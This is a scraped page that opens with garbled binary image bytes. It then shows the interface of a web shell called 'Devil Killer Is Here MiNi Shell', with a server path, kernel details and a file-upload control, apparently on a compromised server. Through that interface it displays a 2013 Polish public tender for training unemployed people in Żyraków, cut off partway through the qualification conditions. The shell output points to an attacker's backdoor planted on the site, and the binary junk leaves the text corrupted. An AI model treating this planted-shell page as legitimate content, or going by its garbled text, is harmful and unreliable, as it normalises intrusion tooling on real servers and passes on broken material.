JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130704/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130704/133401-N-2013.html

<p class="kh_header"><b>Żyraków: Przeprowadzenie kompleksowych szkoleń dla osób bezrobotnych w ramach projektu pn. Czas na aktywność w gminie Żyraków</b><br>
<b>Numer ogłoszenia: 133401 - 2013; data zamieszczenia: 04.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Ośrodek Pomocy Społecznej w Żyrakowie , Żyraków 137, 39-204 Żyraków, woj. podkarpackie, tel. 14 682 26 35, faks 14 682 26 35.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gopszyrakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie kompleksowych szkoleń dla osób bezrobotnych w ramach projektu pn. Czas na aktywność w gminie Żyraków.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część I zamówienia: 

Przeprowadzenie zajęć doradztwa zawodowego:
- miejsce przeprowadzenia szkolenia: Dębica, Żyraków lub okolice m. Żyraków w odległości nie większej niż 5 km,
- Wykonawca zapewni pomieszczenia dostosowane do przeprowadzenia zajęć,
- ilość godzin: 40 (w tym: 10 godz. zajęć grupowych oraz po 2 godz./osobę zajęć indywidualnych tj. łącznie 30 godz. zajęć indywidualnych) 
- ilość uczestników: 15 osób,
- maksymalna dzienna liczba godzin szkolenia nie może przekroczyć 8 godzin dydaktycznych,
- zajęcia w trybie dziennym,
- zajęcia muszą odpowiadać obowiązującym przepisom,
- celem zajęć będzie dostarczenie wiedzy i umiejętności z zakresu efektywnego poszukiwania pracy, sporządzania podstawowych dokumentów, autoanaliza mocnych i słabych stron pod kątem poszukiwania pracy,
- w ramach zajęć teoretycznych Wykonawca zapewni: wykładowcę, podręczniki, skrypty, materiały piśmienno-biurowe oraz wszelkie inne środki dydaktyczne niezbędne do ich realizacji przedmiotu zamówienia,
- Wykonawca zapewni taką ilość materiałów do zajęć teoretycznych, która pozwoli na ich prawidłowe przeprowadzenie,
- Wykonawca poprowadzi dokumentację z przebiegu zajęć, którą stanowić będą: program nauczania, dziennik zajęć zawierający imienną listę obecności podpisaną przez kursantów długopisem koloru niebieskiego, wymiar godzin i tematy zajęć,
- w związku z finansowaniem szkolenia ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Zamawiający wymaga oznakowania miejsc szkoleń, wszelkich druków, dokumentów i zaświadczeń zgodnie z WYTYCZNYMI DOTYCZĄCYMI OZNACZANIA PROJEKTÓW W RAMACH PROGRAMU OPERACYJNEGO KAPITAŁ LUDZKI  z 4 lutego 2009r.,
- przed rozpoczęciem kursu Wykonawca przedstawi Zamawiającemu do akceptacji program szkolenia, który musi być zgodny z obowiązującymi przepisami,
- Wykonawca zapewni jeden ciepły posiłek w każdym dniu szkolenia składający się z zupy i drugiego dania oraz napoje: kawę, herbatę, wodę mineralną,
- termin realizacji: 21 dni od podpisania umowy.

Przeprowadzenie treningu kompetencji społecznych:
- miejsce przeprowadzenia szkolenia: Dębica, Żyraków lub okolice m. Żyraków w odległości nie większej niż 5 km,
- Wykonawca zapewni pomieszczenia dostosowane do przeprowadzenia zajęć
- ilość godzin: 25 (zajęcia grupowe)
- ilość uczestników: 15 osób,
- maksymalna dzienna liczba godzin szkolenia nie może przekroczyć 8 godzin dydaktycznych,
- zajęcia w trybie dziennym,
- zajęcia muszą odpowiadać obowiązującym przepisom,
- celem zajęć będzie nabycie przez kursantów wiedzy i umiejętności z zakresu komunikacji interpersonalnej, asertywności, sposobów rozwiązywania konfliktów i radzenia sobie w trudnych sytuacjach oraz efektywnego zarządzania budżetem domowym,
- w ramach zajęć Wykonawca zapewni: wykładowcę, podręczniki, skrypty, materiały piśmienno-biurowe, oraz wszelkie inne środki dydaktyczne niezbędne do ich realizacji.
- Wykonawca zapewni taką ilość materiałów do zajęć teoretycznych, która pozwoli na ich prawidłowe przeprowadzenie,
- Wykonawca poprowadzi dokumentację z przebiegu zajęć, którą stanowić będą: program nauczania, dziennik zajęć zawierający imienną listę obecności podpisaną przez kursantów długopisem koloru niebieskiego, wymiar godzin i tematy zajęć,
- w związku z finansowaniem szkolenia ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Zamawiający wymaga oznakowania miejsc szkoleń, wszelkich druków, dokumentów 
i zaświadczeń zgodnie z WYTYCZNYMI DOTYCZĄCYMI OZNACZANIA PROJEKTÓW W RAMACH PROGRAMU OPERACYJNEGO KAPITAŁ LUDZKI  z 4 lutego 2009r.,
- przed rozpoczęciem kursu Wykonawca przedstawi Zamawiającemu do akceptacji program szkolenia, który musi być zgodny z obowiązującymi przepisami,
- Wykonawca zapewni jeden ciepły posiłek w każdym dniu szkolenia składający się z zupy i drugiego dania oraz napoje: kawę, herbatę, wodę mineralną,
- termin realizacji: 21 dni od podpisania umowy.
 

Część II zamówienia: Przeprowadzenie szkolenia - przedstawiciel handlowy z kursem prawa jazdy kat. B:

- miejsce przeprowadzenia szkolenia: Dębica, Żyraków lub okolice m. Żyraków w odległości nie większej niż 5 km,
- Wykonawca zapewni pomieszczenia dostosowane do przeprowadzenia szkolenia,
- ilość godzin teorii: minimum zgodnie z obowiązującymi przepisami,
- ilość godzin praktyki: minimum zgodnie z obowiązującymi przepisami,
- łączna planowana ilość godzin: 140,
- ilość uczestników: 4 osoby,
- maksymalna dzienna liczba godzin szkolenia nie może przekroczyć 8 godzin dydaktycznych,
- szkolenie w trybie dziennym,
- szkolenie musi odpowiadać obowiązującym przepisom,
- w ramach szkolenia Wykonawca musi zaznajomić uczestników kursu z zagadnieniami przepisów BHP,
- tematyka szkolenia winna być związana z podstawowymi zadaniami przedstawiciela handlowego, profesjonalną obsługą klienta, profesjonalną prezentacją handlową, metodami pozyskiwania klientów,  technikami sprzedaży, promocją  w handlu,
- szkolenie obejmuje przeprowadzenie kursu przygotowującego do egzaminu na prawo jazdy kat. B,
- kurs musi kończyć się egzaminem z części teoretycznej i praktycznej oraz wydaniem zaświadczenia na druku Ministerstwa Edukacji Narodowej o ukończeniu kursu i uprawnieniami do wykonywania zawodu,
- Wykonawca zapewni ubezpieczenie każdego uczestnika kursu w niezbędnym zakresie, czego potwierdzeniem będzie przekazanie kopii polisy ubezpieczeniowej Zamawiającemu przed rozpoczęciem zajęć,
- w ramach zajęć teoretycznych kursu przyuczającego do zawodu Wykonawca zapewni: wykładowcę, podręczniki, skrypty, materiały piśmienno-biurowe oraz wszelkie inne środki dydaktyczne niezbędne do realizacji szkolenia,
- Wykonawca w zakresie zajęć praktycznych zapewni: instruktorów nauki zawodu, instruktorów jazdy, urządzenia i materiały do zajęć praktycznych,
- Wykonawca zapewni taką ilość materiałów do zajęć teoretycznych i praktycznych, która pozwoli na ich prawidłowe przeprowadzenie,
- Wykonawca poprowadzi dokumentację z przebiegu szkolenia, którą stanowić będą: program nauczania, dziennik zajęć edukacyjnych zawierający imienną listę obecności podpisaną przez kursantów długopisem koloru niebieskiego, wymiar godzin zajęć edukacyjnych i tematy zajęć edukacyjnych, rejestr wydanych zaświadczeń z potwierdzonym odbiorem przez kursantów,
- w związku z finansowaniem szkolenia ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Zamawiający wymaga oznakowania miejsc szkoleń, wszelkich druków, dokumentów i zaświadczeń zgodnie z WYTYCZNYMI DOTYCZĄCYMI OZNACZANIA PROJEKTÓW W RAMACH PROGRAMU OPERACYJNEGO KAPITAŁ LUDZKI  z 4 lutego 2009r.,
- przed rozpoczęciem kursu Wykonawca przedstawi Zamawiającemu do akceptacji program szkolenia, który musi być zgodny z Rozporządzeniem Ministra Edukacji i Nauki z 3 lutego 2006r. w sprawie uzyskiwania 
i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. Nr 31, poz. 216),
- Wykonawca zapewni badania lekarskie osobie biorącej udział w szkoleniu,
- Wykonawca zapewni jeden ciepły posiłek w każdym dniu szkolenia składający się z zupy i drugiego dania oraz napoje: kawę, herbatę, wodę mineralną,
- termin realizacji: rozpoczęcie nie wcześniej niż po zakończeniu zajęć objętych I częścią zamówienia; zakończenie do 20.12.2013r.


Część III zamówienia: Przeprowadzenie szkolenia - sprzedawca z obsługą kasy fiskalnej:

- miejsce przeprowadzenia szkolenia: Dębica, Żyraków lub okolice m. Żyraków w odległości nie większej niż 5 km,
- Wykonawca zapewni pomieszczenia dostosowane do przeprowadzenia szkolenia,
- ilość godzin teorii: minimum zgodnie z obowiązującymi przepisami,
- ilość godzin praktyki: minimum zgodnie z obowiązującymi przepisami,
- łączna planowana ilość godzin: 67,
- ilość uczestników: 5 osób,
- maksymalna dzienna liczba godzin szkolenia nie może przekroczyć 8 godzin dydaktycznych,
- szkolenie w trybie dziennym,
- szkolenie musi odpowiadać obowiązującym przepisom,
- w ramach szkolenia Wykonawca zaznajomi uczestników szkolenia z obsługą kasy fiskalnej, technikami sprzedaży detalicznej, organizacją pracy w sklepie oraz czynnościami rachunkowo-kasowymi,
- w ramach szkolenia Wykonawca musi zaznajomić uczestników kursu z zagadnieniami przepisów BHP,
- kurs musi kończyć się egzaminem oraz wydaniem zaświadczenia na druku Ministerstwa Edukacji Narodowej o ukończeniu kursu, uprawnieniami do wykonywania zawodu, 
- Wykonawca zapewni ubezpieczenie każdego uczestnika kursu w niezbędnym zakresie, czego potwierdzeniem będzie przekazanie kopii polis ubezpieczeniowych Zamawiającemu przed rozpoczęciem zajęć,
- w ramach zajęć teoretycznych kursu przyuczającego do zawodu Wykonawca zapewni: wykładowcę, podręczniki, skrypty, materiały piśmienno-biurowe oraz wszelkie inne środki dydaktyczne niezbędne do realizacji szkolenia,
- Wykonawca w zakresie zajęć praktycznych zapewni: instruktorów nauki zawodu, urządzenia, materiały do zajęć praktycznych, odzież roboczą i środki ochrony indywidualnej,
- Wykonawca zapewni taką ilość materiałów do zajęć teoretycznych i praktycznych, która pozwoli na ich prawidłowe przeprowadzenie,
- Wykonawca poprowadzi dokumentację z przebiegu szkolenia, którą stanowić będą: program nauczania, dziennik zajęć edukacyjnych zawierający imienną listę obecności podpisaną przez kursantów długopisem koloru niebieskiego, wymiar godzin zajęć edukacyjnych i tematy zajęć edukacyjnych, rejestr wydanych zaświadczeń z potwierdzonym odbiorem przez kursantów,
- w związku z finansowaniem szkolenia ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Zamawiający wymaga oznakowania miejsc szkoleń, wszelkich druków, dokumentów i zaświadczeń zgodnie z WYTYCZNYMI DOTYCZĄCYMI OZNACZANIA PROJEKTÓW W RAMACH PROGRAMU OPERACYJNEGO KAPITAŁ LUDZKI  z 4 lutego 2009r.,
- przed rozpoczęciem kursu Wykonawca przedstawi Zamawiającemu do akceptacji program szkolenia, który musi być zgodny z Rozporządzeniem Ministra Edukacji i Nauki z 3 lutego 2006r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. Nr 31, poz. 216),
- Wykonawca zapewni jeden ciepły posiłek w każdym dniu szkolenia składający się z zupy i drugiego dania oraz napoje: kawę, herbatę, wodę mineralną,
- termin realizacji: rozpoczęcie nie wcześniej niż po zakończeniu zajęć objętych I częścią zamówienia; zakończenie do 20.09.2013r.

Część IV zamówienia: Przeprowadzenie szkolenia - opiekun osób starszych i niepełnosprawnych:

- miejsce przeprowadzenia szkolenia: Dębica, Żyraków lub okolice m. Żyraków w odległości nie większej niż 5 km,
- Wykonawca zapewni pomieszczenia dostosowane do przeprowadzenia szkolenia,
- ilość godzin teorii: minimum zgodnie z obowiązującymi przepisami,
- ilość godzin praktyki: minimum zgodnie z obowiązującymi przepisami,
- łączna planowana ilość godzin: 90,
- ilość uczestników: 4 osób,
- maksymalna dzienna liczba godzin szkolenia nie może przekroczyć 8 godzin dydaktycznych,
- szkolenie w trybie dziennym,
- szkolenie musi odpowiadać obowiązującym przepisom,
- w ramach szkolenia Wykonawca zaznajomi kursantów z tematyką pielęgnacji osób starszych oraz przewlekle chorych, z zasadami udzielania pierwszej pomocy przedlekarskiej, zasadami żywienia, rodzajami diet, podstawowymi zagadnieniami z psychologii osób starszych, organizacją czasu wolnego osób starszych, komunikacją interpersonalną oraz pomocą społeczną i współpracą ze środowiskiem,
- Wykonawca zapewni ubezpieczenie każdego uczestnika kursu w niezbędnym zakresie, czego potwierdzeniem będzie przekazanie kopii polis ubezpieczeniowych Zamawiającemu przed rozpoczęciem zajęć,
- w ramach zajęć teoretycznych kursu przyuczającego do zawodu Wykonawca zapewni: wykładowcę, podręczniki, skrypty, materiały piśmienno-biurowe oraz wszelkie inne środki dydaktyczne niezbędne do realizacji szkolenia,
- Wykonawca w zakresie zajęć praktycznych zapewni: instruktorów, urządzenia, materiały do zajęć,
- Wykonawca zapewni taką ilość materiałów do zajęć teoretycznych i praktycznych, która pozwoli na ich prawidłowe przeprowadzenie,
- Wykonawca poprowadzi dokumentację z przebiegu szkolenia, którą stanowić będą: program nauczania, dziennik zajęć edukacyjnych zawierający imienną listę obecności podpisaną przez kursantów długopisem koloru niebieskiego, wymiar godzin zajęć edukacyjnych i tematy zajęć edukacyjnych, rejestr wydanych zaświadczeń z potwierdzonym odbiorem przez kursantów,
- w związku z finansowaniem szkolenia ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Zamawiający wymaga oznakowania miejsc szkoleń, wszelkich druków, dokumentów i zaświadczeń zgodnie z WYTYCZNYMI DOTYCZĄCYMI OZNACZANIA PROJEKTÓW W RAMACH PROGRAMU OPERACYJNEGO KAPITAŁ LUDZKI  z 4 lutego 2009r.,
- przed rozpoczęciem kursu Wykonawca przedstawi Zamawiającemu do akceptacji program szkolenia, który musi być zgodny z Rozporządzeniem Ministra Edukacji i Nauki z 3 lutego 2006r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. Nr 31, poz. 216),
- Wykonawca zapewni jeden ciepły posiłek w każdym dniu szkolenia składający się z zupy i drugiego dania oraz napoje: kawę, herbatę, wodę mineralną
- termin realizacji: rozpoczęcie nie wcześniej niż po zakończeniu zajęć objętych I częścią zamówienia; zakończenie do 20.12.2013r.

Część V zamówienia: Przeprowadzenie szkolenia - pracownik robót wykończeniowych w budownictwie:

- miejsce przeprowadzenia szkolenia: Dębica, Żyraków lub okolice m. Żyraków w odległości nie większej niż 5 km,
- Wykonawca zapewni pomieszczenia dostosowane do przeprowadzenia szkolenia,
- ilość godzin teorii: minimum zgodnie z obowiązującymi przepisami,
- ilość godzin praktyki: minimum zgodnie z obowiązującymi przepisami,
- łączna ilość godzin: 170,
- ilość uczestników: 2 osoby,
- maksymalna dzienna liczba godzin szkolenia nie może przekroczyć 8 godzin dydaktycznych,
- szkolenie w trybie dziennym,
- szkolenie musi odpowiadać obowiązującym przepisom,
- w ramach szkolenia Wykonawca zaznajomi kursantów z tematyką 
- w ramach szkolenia Wykonawca musi zaznajomić uczestników kursu z zagadnieniami przepisów BHP,
- kurs musi kończyć się egzaminem z części teoretycznej i praktycznej oraz wydaniem zaświadczenia na druku Ministerstwa Edukacji Narodowej o ukończeniu kursu i uprawnieniami do wykonywania zawodu pracownika robót wykończeniowych w budownictwie,
- Wykonawca zapewni ubezpieczenie w niezbędnym zakresie (OC, NW) każdego uczestnika kursu, czego potwierdzeniem będzie przekazanie kopii polis ubezpieczeniowych Zamawiającemu przed rozpoczęciem zajęć,
- w ramach zajęć teoretycznych kursu przyuczającego do zawodu Wykonawca zapewni: wykładowcę, podręczniki, skrypty, materiały piśmienno-biurowe, środki dydaktyczne niezbędne do realizacji szkolenia,
- Wykonawca w zakresie zajęć praktycznych zapewni: instruktorów nauki zawodu, urządzenia, materiały do zajęć praktycznych, odzież roboczą i środki ochrony indywidualnej,
- Wykonawca zapewni taką ilość materiałów do zajęć teoretycznych i praktycznych, która pozwoli na ich prawidłowe przeprowadzenie,
- Wykonawca poprowadzi dokumentację z przebiegu szkolenia, którą stanowić będą: program nauczania, dziennik zajęć edukacyjnych zawierający imienną listę obecności podpisaną przez kursantów długopisem koloru niebieskiego, wymiar godzin zajęć edukacyjnych i tematy zajęć edukacyjnych, rejestr wydanych zaświadczeń z potwierdzonym odbiorem przez kursantów,
- w związku z finansowaniem szkolenia ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Zamawiający wymaga oznakowania miejsc szkoleń, wszelkich druków, dokumentów i zaświadczeń zgodnie z WYTYCZNYMI DOTYCZĄCYMI OZNACZANIA PROJEKTÓW W RAMACH PROGRAMU OPERACYJNEGO KAPITAŁ LUDZKI  z 4 lutego 2009r.,
- przed rozpoczęciem kursu Wykonawca przedstawi Zamawiającemu do akceptacji program szkolenia, który musi być zgodny z Rozporządzeniem Ministra Edukacji i Nauki z 3 lutego 2006r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. Nr 31, poz. 216),
- Wykonawca zapewni badania lekarskie osobom biorącym udział w szkoleniu jeżeli są one niezbędne do odbycia kursu.
- Wykonawca zapewni jeden ciepły posiłek w każdym dniu szkolenia składający się z zupy i drugiego dania oraz napoje: kawę, herbatę, wodę mineralną
- termin realizacji: rozpoczęcie nie wcześniej niż po zakończeniu zajęć objętych I częścią zamówienia; zakończenie do 20.12.2013r..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, o których mowa w art. 67 ust.1 pkt 6 Pzp, o wartości nie większej niż 30% wartości zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.00.00.00-4, 80.53.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wnoszenia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, jest spełniony jeżeli Wykonawca posiada:
1) oświadczenie o spełnianiu warunków udziału w postępowaniu wg wzoru na załączniku nr 2 do SIWZ,
2) posiada aktualny wpis do rejestru instytucji szkoleniowych prowadzonego przez wojewódzki urząd pracy właściwy ze względu na siedzibę instytucji szkoleniowej (zgodnie z art. 20 ust. 1 ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy, Dz. U. z 2013, poz. 674 j.t.
(w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, Wykonawcy są zobowiązani dołączyć do oferty jedno wspólne oświadczenie na załączniku nr 2 podpisane przez każdego z nich, a pozostałe dokumenty składają tak, aby wspólnie spełnić warunek udziału w postępowaniu).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek posiadania niezbędnej wiedzy i doświadczenia do prawidłowego zrealizowania zamówienia jest spełniony jeżeli Wykonawca przedłoży:

W przypadku składania oferty na część I zamówienia:
1) oświadczenie o spełnianiu warunków udziału w postępowaniu wg wzoru na załączniku nr 2 do SIWZ,
2) wykaz z co najmniej 1 wykonaną, a w przypadku świadczenia okresowego lub ciągłego również wykonywaną, główną usługę związaną z przeprowadzeniem zajęć doradztwa zawodowego oraz treningu kompetencji społecznych, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem jej wartości, przedmiotu, dat wykonania i podmiotu, na rzecz którego usługa została wykonana oraz załączeniem dowodów, czy została wykonana lub jest wykonywana należycie - wg wzoru na załączniku nr 4 do SIWZ. Zamawiający uzna warunek za spełniony jeżeli Wykonawca przeprowadził oddzielnie co najmniej jeden kurs doradztwa zawodowego, oddzielnie co najmniej jeden kurs treningu kompetencji społecznych lub wykonał obydwa kursy w ramach jednego szkolenia.

W przypadku składania oferty na część II zamówienia:
1) oświadczenie o spełnianiu warunków udziału w postępowaniu wg wzoru na załączniku nr 2 do SIWZ,
2) wykaz z co najmniej 1 wykonaną, a w przypadku świadczenia okresowego lub ciągłego również wykonywaną, główną usługę związaną z przeprowadzeniem szkolenia do zawodu przedstawiciela handlowego i przeprowadzeniem kursu prawa jazdy kat. B, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem jej wartości, przedmiotu, dat wykonania i podmiotu, na rzecz którego usługa została wykonana oraz załączeniem dowodów, czy została wykonana lub jest wykonywana należycie - wg wzoru na załączniku nr 4 do SIWZ. Zamawiający uzna warunek za spełniony jeżeli Wykonawca przeprowadził oddzielnie co najmniej jedno szkolenie do zawodu przedstawiciela, oddzielnie co najmniej jeden kurs prawa jazdy kat. B lub wykonał obydwa kursy w ramach jednego szkolenia.

W przypadku składania oferty na część III zamówienia:
1) oświadczenie o spełnianiu warunków udziału w postępowaniu wg wzoru na załączniku nr 2 do SIWZ,
2) wykaz z co najmniej 1 wykonaną, a w przypadku świadczenia okresowego lub ciągłego również wykonywaną, główną usługę związaną z przeprowadzeniem szkolenia do zawodu sprzedawcy wraz z obsługą kasy fiskalnej, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem jej wartości, przedmiotu, dat wykonania i podmiotu, na rzecz którego usługa została wykonana oraz załączeniem dowodów, czy została wykonana lub jest wykonywana należycie - wg wzoru na załączniku nr 4 do SIWZ.

W przypadku składania oferty na część IV zamówienia:
1) oświadczenie o spełnianiu warunków udziału w postępowaniu wg wzoru na załączniku nr 2 do SIWZ,
